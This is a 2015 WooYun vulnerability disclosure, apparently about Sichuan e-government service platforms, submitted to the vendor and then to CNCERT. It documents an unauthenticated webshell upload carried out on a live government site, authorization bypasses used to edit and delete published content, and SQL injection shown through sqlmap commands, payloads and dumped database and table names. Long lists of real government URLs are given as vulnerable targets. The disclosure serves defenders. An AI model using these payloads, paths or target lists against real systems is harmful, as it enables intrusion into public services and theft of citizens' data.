当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0110236

漏洞标题:某省份大量政府在用系统多处注入+多处越权+无需登录直接GETSHELL

相关厂商:四川电信

漏洞作者: 路人甲

提交时间:2015-05-05 11:36

修复时间:2015-08-07 16:26

公开时间:2015-08-07 16:26

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-05: 细节已通知厂商并且等待厂商处理中
2015-05-09: 厂商已经确认,细节仅向厂商公开
2015-05-12: 细节向第三方安全合作伙伴开放
2015-07-03: 细节向核心白帽子及相关领域专家公开
2015-07-13: 细节向普通白帽子公开
2015-07-23: 细节向实习白帽子公开
2015-08-07: 细节向公众公开

简要描述:

某省份大量政府在用系统三处注入+多处越权+无需登录直接GETSHELL+直接沦陷服务器
有雷么 雷响一个你看怎么样。

详细说明:

更多案例见: WooYun: 四川政府大量在用系统SQL注入漏洞(100+案例)

漏洞证明:

注:getshell重复: WooYun: 四川省各地政务服务大厅Getshell漏洞(四川各地方县市大厅通用)
0x1 

无需登录getshell:


下面随便提取几个站做演示:
http://egov.fszw.cn:8080/pages/offLine/questerOffLine.jsp
http://egov.pzhzw.gov.cn:8080/pages/offLine/questerOffLine.jsp
http://egov.scdongqu.gov.cn:8080/pages/offLine/questerOffLine.jsp
http://egov.pzhsxq.gov.cn:8080/pages/offLine/questerOffLine.jsp
http://egov.hjxzwzx.gov.cn:8080/pages/offLine/questerOffLine.jsp
http://egov.glzwzx.gov.cn:8080/pages/offLine/questerOffLine.jsp
http://egov.ljzw.gov.cn:8080/pages/offLine/questerOffLine.jsp
http://egov.scnczw.gov.cn:8080/pages/offLine/questerOffLine.jsp
http://egov.wangcangzw.gov.cn:8080/pages/offLine/questerOffLine.jsp


在这就用这个站做演示吧:
http://egov.wangcangzw.gov.cn:8080/pages/offLine/questerOffLine.jsp

1.png


直接上传jsp马,上传成功直接审查元素或者查看源码

2.png


<a onclick="downloadAttachment('1.jsp','D:/J2EE/TongWeb5.0/autodeploy/kb.war/questerOffLine/b41dc16800b64c0cabf394a1440f6434.jsp');"  style="cursor: hand;" target="_blank">1.jsp </a> <a onclick="delAttachment('26b63664135e4b40a99673161e1fcab2');"   style="cursor: hand;"> 删除</a><br/>


注意此处路径,正确路径为:

questerOffLine/b41dc16800b64c0cabf394a1440f6434.jsp


好,我们试着打开我们可爱的马看看。

http://egov.wangcangzw.gov.cn:8080/questerOffLine/b41dc16800b64c0cabf394a1440f6434.jsp


123.jpg


成功。
0x2

越权1:


越权文件:servlet/search?state=2


http://www.zljzw.gov.cn:8080/servlet/search?state=2
http://egov.zgytzw.gov.cn:8080/servlet/search?state=2
http://egov.rxzw.gov.cn:8080/servlet/search?state=2
http://egov.fszw.cn:8080/servlet/search?state=2
http://egov.pzhzw.gov.cn:8080/servlet/search?state=2
http://egov.scdongqu.gov.cn:8080/servlet/search?state=2
http://egov.pzhsxq.gov.cn:8080/servlet/search?state=2
http://egovrh.pzhzw.gov.cn:8080/servlet/search?state=2
http://egov.lzjyzw.gov.cn:8080/servlet/search?state=2
http://www.sclxzw.gov.cn:8080/servlet/search?state=2
http://egov.hjxzwzx.gov.cn:8080/servlet/search?state=2
http://egov.xyzwzx.gov.cn:8080/servlet/search?state=2
http://egov.longmatan.gov.cn:8080/servlet/search?state=2
http://egov.naxi.gov.cn:8080/servlet/search?state=2
http://egov.glzwzx.gov.cn:8080/servlet/search?state=2
http://egov.dyzw.gov.cn:8080/servlet/search?state=2
http://egov.ghzw.gov.cn:8080/servlet/search?state=2
http://egov.ljzw.gov.cn:8080/servlet/search?state=2
http://egov.zjzw.dyzw.gov.cn:8080/servlet/search?state=2
http://egov.sfzw.gov.cn:8080/servlet/search?state=2
http://egov.jyzw.dyzw.gov.cn:8080/servlet/search?state=2
http://egov.gyzwfw.gov.cn:8080/servlet/search?state=2
http://egov.cxzw.gov.cn:8080/servlet/search?state=2
http://egov.lzzwfw.gov.cn:8080/servlet/search?state=2
http://egov.jgzw.gov.cn:8080/servlet/search?state=2
http://egov.wangcangzw.gov.cn:8080/servlet/search?state=2
http://egov.gyybzw.gov.cn:8080/servlet/search?state=2
http://egov.gyctzw.gov.cn:8080/servlet/search?state=2
http://egov.qczw.gov.cn:8080/servlet/search?state=2
http://egov.scsn.gov.cn:8080/servlet/search?state=2
http://egov.wtq.gov.cn:8080/servlet/search?state=2
http://egov.shawan.gov.cn:8080/servlet/search?state=2
http://egov.jingyan.gov.cn:8080/servlet/search?state=2
http://egov.lsszq.gov.cn:8080/servlet/search?state=2
http://egov.emeishan.gov.cn:8080/servlet/search?state=2
http://egov.eb.gov.cn:8080/servlet/search?state=2
http://egov.qwzw.gov.cn:8080/servlet/search?state=2
http://egov.jiajiang.gov.cn:8080/servlet/search?state=2
http://egov.muchuan.gov.cn:8080/servlet/search?state=2
http://egov.jkh.gov.cn:8080/servlet/search?state=2
http://egov.mabian.gov.cn:8080/servlet/search?state=2
http://egov.scnczw.gov.cn:8080/servlet/search?state=2


12.jpg


随机点一个:

11.jpg


我们就试着修改它看看:

22.png


33.png


修改完它会自动跳到未审定这块,我们点击到已发布。

44.png


这是我们刚刚修改的 我们打开看看越权修改成功不。

55.png


越权1

成功。
0x3

越权2:


越权文件:MyJsp.jsp


我个人测试都是通杀的,下面就随便拿一个站测试,
http://egov.fszw.cn:8080/MyJsp.jsp

66.png


在这我们随便删除一个文件试试。

77.png


88.png


99.png


成功删除掉00183那个。

越权2

成功。
0x4

越权3:


越权文件:dictpages/frameIndex.jsp


http://egov.fszw.cn:8080/dictpages/frameIndex.jsp

111.png


一样是可以添加发布删除,就不做演示了。
0x5

注入1


http://egov.zgdazw.gov.cn:8080/servlet/view?qid=4
http://www.zljzw.gov.cn:8080/servlet/view?qid=4
http://egov.zgytzw.gov.cn:8080/servlet/view?qid=4
http://egov.rxzw.gov.cn:8080/servlet/view?qid=4
http://egov.fszw.cn:8080/servlet/view?qid=4
http://egov.pzhzw.gov.cn:8080/servlet/view?qid=4
http://egov.scdongqu.gov.cn:8080/servlet/view?qid=4
http://egov.pzhsxq.gov.cn:8080/servlet/view?qid=4
http://egovrh.pzhzw.gov.cn:8080/servlet/view?qid=4
http://egov.lzjyzw.gov.cn:8080/servlet/view?qid=4
http://www.sclxzw.gov.cn:8080/servlet/view?qid=4
http://egov.hjxzwzx.gov.cn:8080/servlet/view?qid=4
http://egov.xyzwzx.gov.cn:8080/servlet/view?qid=4
http://egov.longmatan.gov.cn:8080/servlet/view?qid=4
http://egov.naxi.gov.cn:8080/servlet/view?qid=4
http://egov.glzwzx.gov.cn:8080/servlet/view?qid=4
http://egov.dyzw.gov.cn:8080/servlet/view?qid=4
http://egov.ghzw.gov.cn:8080/servlet/view?qid=4
http://egov.ljzw.gov.cn:8080/servlet/view?qid=4
http://egov.zjzw.dyzw.gov.cn:8080/servlet/view?qid=4
http://egov.sfzw.gov.cn:8080/servlet/view?qid=4
http://egov.jyzw.dyzw.gov.cn:8080/servlet/view?qid=4
http://egov.gyzwfw.gov.cn:8080/servlet/view?qid=4
http://egov.cxzw.gov.cn:8080/servlet/view?qid=4
http://egov.lzzwfw.gov.cn:8080/servlet/view?qid=4
http://egov.jgzw.gov.cn:8080/servlet/view?qid=4
http://egov.wangcangzw.gov.cn:8080/servlet/view?qid=4
http://egov.gyybzw.gov.cn:8080/servlet/view?qid=4
http://egov.gyctzw.gov.cn:8080/servlet/view?qid=4
http://egov.qczw.gov.cn:8080/servlet/view?qid=4
http://egov.scsn.gov.cn:8080/servlet/view?qid=4
http://egov.wtq.gov.cn:8080/servlet/view?qid=4
http://egov.shawan.gov.cn:8080/servlet/view?qid=4
http://egov.jingyan.gov.cn:8080/servlet/view?qid=4
http://egov.lsszq.gov.cn:8080/servlet/view?qid=4
http://egov.emeishan.gov.cn:8080/servlet/view?qid=4
http://egov.eb.gov.cn:8080/servlet/view?qid=4
http://egov.qwzw.gov.cn:8080/servlet/view?qid=4
http://egov.jiajiang.gov.cn:8080/servlet/view?qid=4
http://egov.muchuan.gov.cn:8080/servlet/view?qid=4
http://egov.jkh.gov.cn:8080/servlet/view?qid=4
http://egov.mabian.gov.cn:8080/servlet/view?qid=4
http://egov.scnczw.gov.cn:8080/servlet/view?qid=4


222.png


由于表太多就没跑完

[root@Hacker~]# Sqlmap -u http://egov.zgdazw.gov.cn:8080/servlet/view?qid=4 --ta
bles
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 03:02:48
[03:02:48] [INFO] resuming back-end DBMS 'microsoft sql server'
[03:02:48] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: qid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: qid=4 AND 2802=2802
    Type: UNION query
    Title: Generic UNION query (NULL) - 13 columns
    Payload: qid=-1600 UNION ALL SELECT NULL, CHAR(58)+CHAR(119)+CHAR(99)+CHAR(1
18)+CHAR(58)+CHAR(66)+CHAR(72)+CHAR(99)+CHAR(116)+CHAR(68)+CHAR(112)+CHAR(84)+CH
AR(111)+CHAR(122)+CHAR(68)+CHAR(58)+CHAR(118)+CHAR(115)+CHAR(105)+CHAR(58), NULL
, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: qid=4; WAITFOR DELAY '0:0:5';--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: qid=4 WAITFOR DELAY '0:0:5'--
---
[03:02:48] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP, JSP 2.1
back-end DBMS: Microsoft SQL Server 2008
[03:02:48] [INFO] fetching database names
[03:02:49] [INFO] the SQL query used returns 13 entries
[03:02:49] [INFO] retrieved: "Egh"
[03:02:49] [INFO] retrieved: "EghFiles"
[03:02:50] [INFO] retrieved: "master"
[03:02:50] [INFO] retrieved: "model"
[03:02:50] [INFO] retrieved: "msdb"
[03:02:50] [INFO] retrieved: "ReportServer"
[03:02:50] [INFO] retrieved: "ReportServerTempDB"
[03:02:51] [INFO] retrieved: "tempdb"
[03:02:51] [INFO] retrieved: "tyfocontent"
[03:02:51] [INFO] retrieved: "tyfoinvestigate"
[03:02:51] [INFO] retrieved: "tyfomsg"
[03:02:52] [INFO] retrieved: "tyfopublish"
[03:02:52] [INFO] retrieved: "tyfosearch"
[03:02:52] [INFO] fetching tables for databases: Egh, EghFiles, ReportServer, Re
portServerTempDB, master, model, msdb, tempdb, tyfocontent, tyfoinvestigate, tyf
omsg, tyfopublish, tyfosearch
[03:02:53] [INFO] the SQL query used returns 68 entries
[03:02:53] [INFO] retrieved: "dbo.AppProject"
[03:02:53] [INFO] retrieved: "dbo.Appraise"
[03:02:53] [INFO] retrieved: "dbo.BackUserPwd"
[03:02:54] [INFO] retrieved: "dbo.Complaints"
[03:02:54] [INFO] retrieved: "dbo.ConsultLabel"
[03:02:54] [INFO] retrieved: "dbo.ConvenienceCenter"
[03:02:54] [INFO] retrieved: "dbo.D99_Tmp"
[03:02:55] [INFO] retrieved: "dbo.data_file"
[03:02:55] [INFO] retrieved: "dbo.DateSet"
[03:02:55] [INFO] retrieved: "dbo.Datum"
[03:02:55] [INFO] retrieved: "dbo.datumlegend"
[03:02:56] [INFO] retrieved: "dbo.FlowSet"
[03:02:56] [INFO] retrieved: "dbo.FlowShip"
[03:02:56] [INFO] retrieved: "dbo.FlowTurnOut"
[03:02:56] [INFO] retrieved: "dbo.GscApproveConditionSet"
[03:02:56] [INFO] retrieved: "dbo.GscDay"
[03:02:57] [INFO] retrieved: "dbo.GscOrgan"
[03:02:57] [INFO] retrieved: "dbo.GscPubUser"
[03:02:57] [INFO] retrieved: "dbo.GscUser"
[03:02:57] [INFO] retrieved: "dbo.HandedData"
[03:02:58] [INFO] retrieved: "dbo.HandedDataFile"
[03:02:58] [INFO] retrieved: "dbo.KB_KEYWORD"
[03:02:58] [INFO] retrieved: "dbo.KB_QUESTION_ANSWER"
[03:02:58] [INFO] retrieved: "dbo.KB_SAME_KEY"
[03:02:59] [INFO] retrieved: "dbo.KB_WORD_QUESTION"
[03:02:59] [INFO] retrieved: "dbo.Label_UserPriority"
[03:02:59] [INFO] retrieved: "dbo.Log"
[03:02:59] [INFO] retrieved: "dbo.MSG_auto_reply"
[03:03:00] [INFO] retrieved: "dbo.MSG_CONTENTS"
[03:03:00] [INFO] retrieved: "dbo.MSG_NO"
[03:03:00] [INFO] retrieved: "dbo.MSG_OverTime"
[03:03:01] [INFO] retrieved: "dbo.MSG_POOL"
[03:03:01] [INFO] retrieved: "dbo.MSG_QUESTER"
[03:03:01] [INFO] retrieved: "dbo.MSG_SATIS"
[03:03:01] [INFO] retrieved: "dbo.MSG_WORK_DEPT"
[03:03:02] [INFO] retrieved: "dbo.MSG_WORK_ONLINE"
[03:03:02] [INFO] retrieved: "dbo.one_tb_data"
[03:03:02] [INFO] retrieved: "dbo.one_tb_model"
[03:03:02] [INFO] retrieved: "dbo.ORG_ONLINE"
[03:03:03] [INFO] retrieved: "dbo.OrganAppWorkStat"
[03:03:03] [INFO] retrieved: "dbo.Parallel"
[03:03:03] [INFO] retrieved: "dbo.ParallelRelation"
[03:03:03] [INFO] retrieved: "dbo.predict"
[03:03:04] [INFO] retrieved: "dbo.Prejudication"
[03:03:04] [INFO] retrieved: "dbo.Processes"
[03:03:04] [INFO] retrieved: "dbo.Projects"
[03:03:04] [INFO] retrieved: "dbo.QuesterOffLine"
[03:03:04] [INFO] retrieved: "dbo.QuesterOffLineAttach"
[03:03:05] [INFO] retrieved: "dbo.RCC_COMPLAINTS"
[03:03:05] [INFO] retrieved: "dbo.RCC_LOG"
[03:03:05] [INFO] retrieved: "dbo.RCC_REDISSATISFILD"
[03:03:05] [INFO] retrieved: "dbo.RCC_REMINDED"
[03:03:06] [INFO] retrieved: "dbo.RES_RESERVATION"
[03:03:06] [INFO] retrieved: "dbo.SendEmailHistory"
[03:03:06] [INFO] retrieved: "dbo.SendEmailList"
[03:03:06] [INFO] retrieved: "dbo.SmsAdvice"
[03:03:07] [INFO] retrieved: "dbo.Sync"
[03:03:07] [INFO] retrieved: "dbo.SyncRecord"
[03:03:07] [INFO] retrieved: "dbo.T_Egh_AdminUsers"
[03:03:07] [INFO] retrieved: "dbo.T_Egh_SetPastoralPoetry"
[03:03:08] [INFO] retrieved: "dbo.T_Front_UserInfo"
[03:03:08] [INFO] retrieved: "dbo.T_Mobile_SMSSend"
[03:03:08] [INFO] retrieved: "dbo.T_Mobile_SMSSendHistory"
[03:03:09] [INFO] retrieved: "dbo.ThisGsc"
[03:03:09] [INFO] retrieved: "dbo.TurnOut"
[03:03:09] [INFO] retrieved: "dbo.UserKeepDataFile"
[03:03:09] [INFO] retrieved: "dbo.UserPower"
[03:03:10] [INFO] retrieved: "dbo.WarrntSet"
[03:03:10] [INFO] the SQL query used returns 1 entries
[03:03:11] [INFO] retrieved: "dbo.data_file"
[03:03:12] [INFO] the SQL query used returns 359 entries
[03:03:12] [INFO] retrieved: "dbo.spt_fallback_db"
[03:03:13] [INFO] retrieved: "dbo.spt_fallback_dev"
[03:03:13] [INFO] retrieved: "dbo.spt_fallback_usg"
[03:03:14] [INFO] retrieved: "dbo.spt_monitor"
[03:03:14] [INFO] retrieved: "dbo.spt_values"
[03:03:14] [INFO] retrieved: "INFORMATION_SCHEMA.CHECK_CONSTRAINTS"
[03:03:15] [INFO] retrieved: "INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE"
[03:03:15] [INFO] retrieved: "INFORMATION_SCHEMA.COLUMN_PRIVILEGES"
[03:03:16] [INFO] retrieved: "INFORMATION_SCHEMA.COLUMNS"
[03:03:16] [INFO] retrieved: "INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE"
[03:03:17] [INFO] retrieved: "INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE"
[03:03:17] [INFO] retrieved: "INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS"
[03:03:17] [INFO] retrieved: "INFORMATION_SCHEMA.DOMAINS"
[03:03:18] [INFO] retrieved: "INFORMATION_SCHEMA.KEY_COLUMN_USAGE"
[03:03:18] [INFO] retrieved: "INFORMATION_SCHEMA.PARAMETERS"
[03:03:19] [INFO] retrieved: "INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS"
[03:03:19] [INFO] retrieved: "INFORMATION_SCHEMA.ROUTINE_COLUMNS"
[03:03:19] [INFO] retrieved: "INFORMATION_SCHEMA.ROUTINES"
[03:03:20] [INFO] retrieved: "INFORMATION_SCHEMA.SCHEMATA"
[03:03:20] [INFO] retrieved: "INFORMATION_SCHEMA.TABLE_CONSTRAINTS"
[03:03:21] [INFO] retrieved: "INFORMATION_SCHEMA.TABLE_PRIVILEGES"
[03:03:21] [INFO] retrieved: "INFORMATION_SCHEMA.TABLES"
[03:03:22] [INFO] retrieved: "INFORMATION_SCHEMA.VIEW_COLUMN_USAGE"
[03:03:22] [INFO] retrieved: "INFORMATION_SCHEMA.VIEW_TABLE_USAGE"
[03:03:22] [INFO] retrieved: "INFORMATION_SCHEMA.VIEWS"
[03:03:23] [INFO] retrieved: "sys.all_columns"
[03:03:23] [INFO] retrieved: "sys.all_objects"
[03:03:24] [INFO] retrieved: "sys.all_parameters"
[03:03:24] [INFO] retrieved: "sys.all_sql_modules"
[03:03:25] [INFO] retrieved: "sys.all_views"
[03:03:25] [INFO] retrieved: "sys.allocation_units"
[03:03:26] [INFO] retrieved: "sys.assemblies"
[03:03:26] [INFO] retrieved: "sys.assembly_files"
[03:03:26] [INFO] retrieved: "sys.assembly_modules"
[03:03:27] [INFO] retrieved: "sys.assembly_references"
[03:03:27] [INFO] retrieved: "sys.assembly_types"
[03:03:28] [INFO] retrieved: "sys.asymmetric_keys"
[03:03:28] [INFO] retrieved: "sys.backup_devices"
[03:03:29] [INFO] retrieved: "sys.certificates"
[03:03:29] [INFO] retrieved: "sys.change_tracking_databases"
[03:03:32] [INFO] retrieved: "sys.change_tracking_tables"
[03:03:33] [INFO] retrieved: "sys.check_constraints"
[03:03:36] [INFO] retrieved: "sys.column_type_usages"
[03:03:37] [INFO] retrieved: "sys.column_xml_schema_collection_usages"
[03:03:38] [INFO] retrieved: "sys.columns"
[03:03:38] [INFO] retrieved: "sys.computed_columns"
[03:03:39] [INFO] retrieved: "sys.configurations"
[03:03:39] [INFO] retrieved: "sys.conversation_endpoints"
[03:03:39] [INFO] retrieved: "sys.conversation_groups"


0x6

注入2


http://egov.zgdazw.gov.cn:8080/servlet/search?state=0
http://www.zljzw.gov.cn:8080/servlet/search?state=0
http://egov.zgytzw.gov.cn:8080/servlet/search?state=0
http://egov.rxzw.gov.cn:8080/servlet/search?state=0
http://egov.fszw.cn:8080/servlet/search?state=0
http://egov.pzhzw.gov.cn:8080/servlet/search?state=0
http://egov.scdongqu.gov.cn:8080/servlet/search?state=0
http://egov.pzhsxq.gov.cn:8080/servlet/search?state=0
http://egovrh.pzhzw.gov.cn:8080/servlet/search?state=0
http://egov.lzjyzw.gov.cn:8080/servlet/search?state=0
http://www.sclxzw.gov.cn:8080/servlet/search?state=0
http://egov.hjxzwzx.gov.cn:8080/servlet/search?state=0
http://egov.xyzwzx.gov.cn:8080/servlet/search?state=0
http://egov.longmatan.gov.cn:8080/servlet/search?state=0
http://egov.naxi.gov.cn:8080/servlet/search?state=0
http://egov.glzwzx.gov.cn:8080/servlet/search?state=0
http://egov.dyzw.gov.cn:8080/servlet/search?state=0
http://egov.ghzw.gov.cn:8080/servlet/search?state=0
http://egov.ljzw.gov.cn:8080/servlet/search?state=0
http://egov.zjzw.dyzw.gov.cn:8080/servlet/search?state=0
http://egov.sfzw.gov.cn:8080/servlet/search?state=0
http://egov.jyzw.dyzw.gov.cn:8080/servlet/search?state=0
http://egov.gyzwfw.gov.cn:8080/servlet/search?state=0
http://egov.cxzw.gov.cn:8080/servlet/search?state=0
http://egov.lzzwfw.gov.cn:8080/servlet/search?state=0
http://egov.jgzw.gov.cn:8080/servlet/search?state=0
http://egov.wangcangzw.gov.cn:8080/servlet/search?state=0
http://egov.gyybzw.gov.cn:8080/servlet/search?state=0
http://egov.gyctzw.gov.cn:8080/servlet/search?state=0
http://egov.qczw.gov.cn:8080/servlet/search?state=0
http://egov.scsn.gov.cn:8080/servlet/search?state=0
http://egov.wtq.gov.cn:8080/servlet/search?state=0
http://egov.shawan.gov.cn:8080/servlet/search?state=0
http://egov.jingyan.gov.cn:8080/servlet/search?state=0
http://egov.lsszq.gov.cn:8080/servlet/search?state=0
http://egov.emeishan.gov.cn:8080/servlet/search?state=0
http://egov.eb.gov.cn:8080/servlet/search?state=0
http://egov.qwzw.gov.cn:8080/servlet/search?state=0
http://egov.jiajiang.gov.cn:8080/servlet/search?state=0
http://egov.muchuan.gov.cn:8080/servlet/search?state=0
http://egov.jkh.gov.cn:8080/servlet/search?state=0
http://egov.mabian.gov.cn:8080/servlet/search?state=0
http://egov.scnczw.gov.cn:8080/servlet/search?state=0


333.png


0x7

注入3


这处注入点有点奇葩,丢sqlmap跑的时候很明显的显示404页面的,但是接着跑既然能跑出来。

http://egov.zgdazw.gov.cn:8080/servlet/kbedit?qid=1
http://www.zljzw.gov.cn:8080/servlet/kbedit?qid=1
http://egov.rxzw.gov.cn:8080/servlet/kbedit?qid=1
http://egovrh.pzhzw.gov.cn:8080/servlet/kbedit?qid=1
http://egov.lzjyzw.gov.cn:8080/servlet/kbedit?qid=1
http://egov.hjxzwzx.gov.cn:8080/servlet/kbedit?qid=1
http://egov.naxi.gov.cn:8080/servlet/kbedit?qid=1
http://egov.glzwzx.gov.cn:8080/servlet/kbedit?qid=1
http://egov.ljzw.gov.cn:8080/servlet/kbedit?qid=1
http://egov.gyzwfw.gov.cn:8080/servlet/kbedit?qid=1
http://egov.cxzw.gov.cn:8080/servlet/kbedit?qid=1
http://egov.lzzwfw.gov.cn:8080/servlet/kbedit?qid=1
http://egov.jgzw.gov.cn:8080/servlet/kbedit?qid=1
http://egov.wangcangzw.gov.cn:8080/servlet/kbedit?qid=1
http://egov.gyybzw.gov.cn:8080/servlet/kbedit?qid=1
http://egov.gyctzw.gov.cn:8080/servlet/kbedit?qid=1
http://egov.qczw.gov.cn:8080/servlet/kbedit?qid=1
http://egov.scsn.gov.cn:8080/servlet/kbedit?qid=1
http://egov.wtq.gov.cn:8080/servlet/kbedit?qid=1
http://egov.shawan.gov.cn:8080/servlet/kbedit?qid=1
http://egov.jingyan.gov.cn:8080/servlet/kbedit?qid=1
http://egov.lsszq.gov.cn:8080/servlet/kbedit?qid=1
http://egov.emeishan.gov.cn:8080/servlet/kbedit?qid=1
http://egov.eb.gov.cn:8080/servlet/kbedit?qid=1
http://egov.qwzw.gov.cn:8080/servlet/kbedit?qid=1
http://egov.jiajiang.gov.cn:8080/servlet/kbedit?qid=1
http://egov.muchuan.gov.cn:8080/servlet/kbedit?qid=1
http://egov.jkh.gov.cn:8080/servlet/kbedit?qid=1
http://egov.mabian.gov.cn:8080/servlet/kbedit?qid=1
http://egov.scnczw.gov.cn:8080/servlet/kbedit?qid=1


[root@Hacker~]# Sqlmap -u http://egov.mabian.gov.cn:8080/servlet/kbedit?qid=1
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutua
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respo
sible for any misuse or damage caused by this program
[*] starting at 03:08:01
[03:08:02] [INFO] testing connection to the target url
[03:08:02] [INFO] testing if the url is stable, wait a few seconds
[03:08:03] [INFO] url is stable
[03:08:03] [INFO] testing if GET parameter 'qid' is dynamic
<code>sqlmap got a 302 redirect to 'http://egov.mabian.gov.cn:8080/servlet/../404.jsp


. Do you want to follow? [Y/n] y
[03:08:06] [INFO] confirming that GET parameter 'qid' is dynamic
[03:08:06] [INFO] GET parameter 'qid' is dynamic
[03:08:06] [WARNING] reflective value(s) found and filtering out
[03:08:06] [WARNING] heuristic test shows that GET parameter 'qid' might not be
injectable
[03:08:06] [INFO] testing for SQL injection on GET parameter 'qid'
[03:08:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[03:08:07] [INFO] GET parameter 'qid' is 'AND boolean-based blind - WHERE or HA
ING clause' injectable
[03:08:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING claus
'
[03:08:07] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[03:08:08] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE
r HAVING clause'
[03:08:08] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XML
ype)'
[03:08:08] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[03:08:08] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[03:08:09] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[03:08:19] [INFO] GET parameter 'qid' is 'Microsoft SQL Server/Sybase stacked q
eries' injectable
[03:08:19] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[03:08:19] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[03:08:20] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[03:08:30] [INFO] GET parameter 'qid' is 'Microsoft SQL Server/Sybase time-base
blind' injectable
[03:08:30] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[03:08:30] [INFO] automatically extending ranges for UNION query injection tech
ique tests as there is at least one other potential injection technique found
[03:08:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[03:08:35] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending
he range for current UNION query injection technique test
[03:08:36] [INFO] target url appears to have 13 columns in query
[03:08:40] [INFO] GET parameter 'qid' is 'Generic UNION query (NULL) - 1 to 20
olumns' injectable
GET parameter 'qid' is vulnerable. Do you want to keep testing the others (if a
y)? [y/N] y
sqlmap identified the following injection points with a total of 63 HTTP(s) req
ests:
---
Place: GET
Parameter: qid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: qid=1 AND 7373=7373
Type: UNION query
Title: Generic UNION query (NULL) - 13 columns
Payload: qid=-9367 UNION ALL SELECT NULL, CHAR(58)+CHAR(115)+CHAR(102)+CHAR
103)+CHAR(58)+CHAR(110)+CHAR(68)+CHAR(72)+CHAR(76)+CHAR(101)+CHAR(109)+CHAR(114
+CHAR(122)+CHAR(79)+CHAR(87)+CHAR(58)+CHAR(112)+CHAR(101)+CHAR(116)+CHAR(58), N
LL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: qid=1; WAITFOR DELAY '0:0:5';--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: qid=1 WAITFOR DELAY '0:0:5'--
---
[03:08:48] [INFO] testing MySQL
[03:08:49] [WARNING] the back-end DBMS is not MySQL
[03:08:49] [INFO] testing Oracle
[03:08:49] [WARNING] the back-end DBMS is not Oracle
[03:08:49] [INFO] testing PostgreSQL
[03:08:50] [WARNING] the back-end DBMS is not PostgreSQL
[03:08:50] [INFO] testing Microsoft SQL Server
[03:08:50] [INFO] confirming Microsoft SQL Server
[03:08:52] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP, JSP 2.1
back-end DBMS: Microsoft SQL Server 2008
[03:08:52] [INFO] fetched data logged to text files under 'C:\DOCUME~1\ADMINI~1
LOCALS~1\Temp\Rar$EX20.218\SQLMAP~1\Bin\output\egov.mabian.gov.cn'</code>

[root@Hacker~]# Sqlmap -u http://egov.mabian.gov.cn:8080/servlet/kbedit?qid=1 --
tables
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 03:09:56
[03:09:56] [INFO] resuming back-end DBMS 'microsoft sql server'
[03:09:56] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: qid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: qid=1 AND 7373=7373
    Type: UNION query
    Title: Generic UNION query (NULL) - 13 columns
    Payload: qid=-9367 UNION ALL SELECT NULL, CHAR(58)+CHAR(115)+CHAR(102)+CHAR(
103)+CHAR(58)+CHAR(110)+CHAR(68)+CHAR(72)+CHAR(76)+CHAR(101)+CHAR(109)+CHAR(114)
+CHAR(122)+CHAR(79)+CHAR(87)+CHAR(58)+CHAR(112)+CHAR(101)+CHAR(116)+CHAR(58), NU
LL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: qid=1; WAITFOR DELAY '0:0:5';--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
